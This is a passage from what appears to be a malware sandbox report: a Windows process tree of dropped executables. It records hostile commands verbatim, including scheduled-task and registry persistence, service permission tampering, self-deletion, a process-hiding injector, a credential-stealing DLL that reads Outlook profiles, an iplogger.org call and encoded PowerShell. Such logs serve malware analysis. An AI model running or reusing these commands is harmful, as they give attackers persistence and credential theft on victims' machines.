                                                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:796
                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                              6⤵
                                                              • Creates scheduled task(s)
                                                              PID:3144
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                              6⤵
                                                                PID:4904
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:5780
                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                6⤵
                                                                  PID:2892
                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                    schtasks /delete /tn "csrss" /f
                                                                    7⤵
                                                                      PID:6424
                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                      schtasks /delete /tn "ScheduledUpdate" /f
                                                                      7⤵
                                                                        PID:6476
                                                              • C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Checks computer location settings
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:2284
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit
                                                                  4⤵
                                                                    PID:5340
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f
                                                                      5⤵
                                                                      • Kills process with taskkill
                                                                      PID:5628
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      5⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:6052
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1556
                                                                    4⤵
                                                                    • Program crash
                                                                    PID:5440
                                                                • C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4316
                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4960
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
                                                                      5⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2908
                                                                    • C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:1424
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      5⤵
                                                                        PID:5984
                                                                  • C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:3232
                                                                    • C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:3840
                                                                      • C:\Users\Admin\AppData\Local\Temp\M52CB.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:2616
                                                                        • C:\Users\Admin\AppData\Local\Temp\M52CB.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
                                                                          6⤵
                                                                            PID:4688
                                                                        • C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3784
                                                                          • C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:4204
                                                                        • C:\Users\Admin\AppData\Local\Temp\EH46E.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\EH46E.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          PID:5536
                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                            "C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S
                                                                            6⤵
                                                                              PID:5348
                                                                          • C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe
                                                                            https://iplogger.org/1x5az7
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies Internet Explorer settings
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:5640
                                                                          • C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4320
                                                                          • C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2596
                                                                      • C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:3680
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"
                                                                          4⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5768
                                                                        • C:\Users\Admin\AppVerif\DllHelper.exe
                                                                          "C:\Users\Admin\AppVerif\DllHelper.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3180
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                            5⤵
                                                                              PID:1180
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
                                                                            4⤵
                                                                              PID:1816
                                                                              • C:\Windows\SysWOW64\chcp.com
                                                                                chcp 65001
                                                                                5⤵
                                                                                  PID:440
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  5⤵
                                                                                  • Runs ping.exe
                                                                                  PID:6000
                                                                            • C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4040
                                                                            • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3964
                                                                              • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Checks computer location settings
                                                                                • Adds Run key to start application
                                                                                • Modifies system certificate store
                                                                                PID:4552
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                  5⤵
                                                                                  • Modifies file permissions
                                                                                  PID:3300
                                                                                • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:5584
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    PID:5716
                                                                                    • C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
                                                                                      "C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4116
                                                                                      • C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
                                                                                        "C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks processor information in registry
                                                                                        PID:5624
                                                                            • C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks computer location settings
                                                                              PID:1216
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 452
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:2332
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 764
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:3832
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 772
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:2380
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 816
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:2156
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 824
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:4324
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 956
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:5156
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1016
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:5316
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1356
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:5732
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit
                                                                                4⤵
                                                                                  PID:6064
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f
                                                                                    5⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5268
                                                                              • C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                PID:2712
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib -?
                                                                                  4⤵
                                                                                  • Views/modifies file attributes
                                                                                  PID:5056
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
                                                                                  4⤵
                                                                                    PID:3788
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd
                                                                                      5⤵
                                                                                        PID:4460
                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                          tasklist /FI "imagename eq PSUAService.exe"
                                                                                          6⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          PID:5084
                                                                                        • C:\Windows\SysWOW64\find.exe
                                                                                          find /I /N "psuaservice.exe"
                                                                                          6⤵
                                                                                            PID:5912
                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                            findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
                                                                                            6⤵
                                                                                              PID:79052
                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                                                                              Tal.exe.pif H
                                                                                              6⤵
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:109144
                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                                                                                7⤵
                                                                                                  PID:5356
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping localhost -n 5
                                                                                                6⤵
                                                                                                • Runs ping.exe
                                                                                                PID:109156
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping -n 5 localhost
                                                                                              5⤵
                                                                                              • Runs ping.exe
                                                                                              PID:109376
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks computer location settings
                                                                                          • Loads dropped DLL
                                                                                          • Checks processor information in registry
                                                                                          PID:3244
                                                                                          • C:\ProgramData\50543188494393494002.exe
                                                                                            "C:\ProgramData\50543188494393494002.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks computer location settings
                                                                                            PID:5800
                                                                                            • C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks computer location settings
                                                                                              PID:3288
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
                                                                                                6⤵
                                                                                                  PID:376
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
                                                                                                    7⤵
                                                                                                      PID:5888
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
                                                                                                    6⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4700
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main
                                                                                                    6⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • Loads dropped DLL
                                                                                                    • Accesses Microsoft Outlook profiles
                                                                                                    • outlook_win_path
                                                                                                    PID:4832
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 1108
                                                                                                  5⤵
                                                                                                  • Program crash
                                                                                                  PID:876
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit
                                                                                                4⤵
                                                                                                  PID:2400
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f
                                                                                                    5⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6060
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    5⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:3196
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1928
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  PID:4624
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2520
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:2020
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5060
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 1216
                                                                                            1⤵
                                                                                              PID:3636
                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                              1⤵
                                                                                                PID:1296
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 1216
                                                                                                1⤵
                                                                                                  PID:3368
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 1216
                                                                                                  1⤵
                                                                                                    PID:4980
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 1216
                                                                                                    1⤵
                                                                                                      PID:3744
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 1216
                                                                                                      1⤵
                                                                                                        PID:2380
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 1216
                                                                                                        1⤵
                                                                                                          PID:756
                                                                                                        • C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                                          "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:4324
                                                                                                          • C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                                            "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5224
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 1216
                                                                                                          1⤵
                                                                                                            PID:5244
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 2284
                                                                                                            1⤵
                                                                                                              PID:5380
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 1216
                                                                                                              1⤵
                                                                                                                PID:5696
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744
                                                                                                                1⤵
                                                                                                                  PID:5968
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 3244
                                                                                                                  1⤵
                                                                                                                    PID:4332
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 5800
                                                                                                                    1⤵
                                                                                                                      PID:5680
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      PID:5248
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 3608
                                                                                                                      1⤵
                                                                                                                        PID:1156
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 5436
                                                                                                                        1⤵
                                                                                                                          PID:5660
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 3608
                                                                                                                          1⤵
                                                                                                                            PID:2076
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 3608
                                                                                                                            1⤵
                                                                                                                              PID:3468
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 3608
                                                                                                                              1⤵
                                                                                                                                PID:2004
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:5748
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5512
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 608
                                                                                                                                    3⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5116
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 5512
                                                                                                                                1⤵
                                                                                                                                  PID:4152
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 3608
                                                                                                                                  1⤵
                                                                                                                                    PID:5304
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 3608
                                                                                                                                    1⤵
                                                                                                                                      PID:4376
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 3608
                                                                                                                                      1⤵
                                                                                                                                        PID:5280
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                        1⤵
                                                                                                                                          PID:376
                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                            2⤵
                                                                                                                                              PID:6860
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 3608
                                                                                                                                            1⤵
                                                                                                                                              PID:1180
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:4452
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
